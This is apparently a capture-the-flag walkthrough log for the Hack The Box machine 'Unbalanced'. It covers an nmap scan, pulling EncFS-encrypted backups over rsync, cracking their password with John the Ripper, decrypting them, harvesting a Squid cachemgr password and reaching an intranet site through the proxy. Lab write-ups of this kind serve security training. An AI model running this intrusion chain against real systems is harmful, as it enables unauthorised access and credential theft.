Machine-Name  :  Unbalanced
IP-Address    :  10.129.24.223

Command-Line: sudo nmap -p- -T4 -A 10.129.24.223
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 01:25 UTC
    Nmap scan report for 10.129.24.223
    Host is up (0.047s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE    VERSION
    22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
    |   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
    |_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
    873/tcp  open  rsync?
    3128/tcp open  http-proxy Squid http proxy 4.6
    |_http-server-header: squid/4.6
    |_http-title: ERROR: The requested URL could not be retrieved
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=4/13%OT=22%CT=1%CU=44489%PV=Y%DS=2%DC=T%G=Y%TM=6074F3F
    OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
    OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
    OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
    OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
    OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
    OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)

    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 23/tcp)
    HOP RTT      ADDRESS
    1   48.98 ms 10.10.14.1
    2   49.21 ms 10.129.24.223

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 223.31 seconds


Browser: http://unbalanced.htb:3128
Result:
     /*
     * Copyright (C) 1996-2019 The Squid Software Foundation and contributors
     *
     * Squid software is distributed under GPLv2+ license and includes
     * contributions from numerous individuals and organizations.
     * Please see the COPYING and CONTRIBUTORS files for details.
     */

    /*
     Stylesheet for Squid Error pages
     Adapted from design by Free CSS Templates
     http://www.freecsstemplates.org
     Released for free under a Creative Commons Attribution 2.5 License
    */

Browser: rsync protocol docs
URL: https://linux.die.net/man/1/rsync
Command-Line: rsync rsync://10.129.24.223
Result:
    conf_backups    EncFS-encrypted configuration backups

Command-Line: rsync rsync://10.129.24.223/conf_backups conf_backups
Result:
    /conf_backups

Notes: Unable to decrypt the files without a password. Using encfs2john.py to acquire password hash.

Command-Line: cp /usr/share/john/encfs2john.py encfs2john.py
Command-Line: python encfs2john.py conf_backups/
Result:
    conf_backups/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add

Command-Line: echo -n 'conf_backups/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add' > hash
Command-Line: john hash --wordlist=/usr/share/wordlist/rockyou.txt
Result:
    Created directory: /root/.john
    Using default input encoding: UTF-8
    Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
    Cost 1 (iteration count) is 580280 for all loaded hashes
    Will run 12 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    bubblegum        (conf_backups/)
    1g 0:00:00:04 DONE (2021-04-14 04:43) 0.2114g/s 162.3p/s 162.3c/s 162.3C/s batista..james1
    Use the "--show" option to display all of the cracked passwords reliably

Notes: Found password (bubblegum)

Browser: decrypt encfs
URL: https://antofthy.gitlab.io/info/crypto/encfs.txt
Result:
    To directly decrypt the encrypted files:
      mkdir /tmp/backup_decrypt
      encfs /external-drive/backup_enc/ /tmp/backup_decrypt
        ...password questions...
      # decrypted filesystem is now mounted
      fusermount -u /tmp/backup_decrypt


Command-Line: encfs ~/HTB/Machines/Unbalanced_NF/conf_backups ~/HTB/Machines/Unbalanced_NF/conf_backups.decrypt
Password: bubblegum
Result:
    *** SUCCESS ***
    /conf_backups.decrypt


Command-Line: cd conf_backups.decrypt
Command-Line: ls -la --sort=size
Result:
    -rw-r--r-- 1 kali kali 316553 Apr  4  2020 squid.conf
Notes: squid.conf is the largest file. We also have a Squid port. Let's check this out more.

Command-Line: cat squid.conf | grep acl
    acl intranet dstdomain -n intranet.unbalanced.htb
    acl intranet_net dst -n 172.16.0.0/12

Command-Line: cat squid.conf | grep "*_passwd"
Result:
    cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
Notes: Found possible password (Thah$Sh1). Attempting to access 10.129.24.223:3128 through the Squid proxy. Changing settings in my FireFox preferences to accommodate.

Proxy-Setting:
    preferences/network-settings/settings/
    * Manual proxy configuration
    HTTP proxy: 10.129.24.223
    Port: 3128

Browser: intranet.unbalanced.htb
Result:
    *** SUCCESS ***
Notes: Able to view web-page.
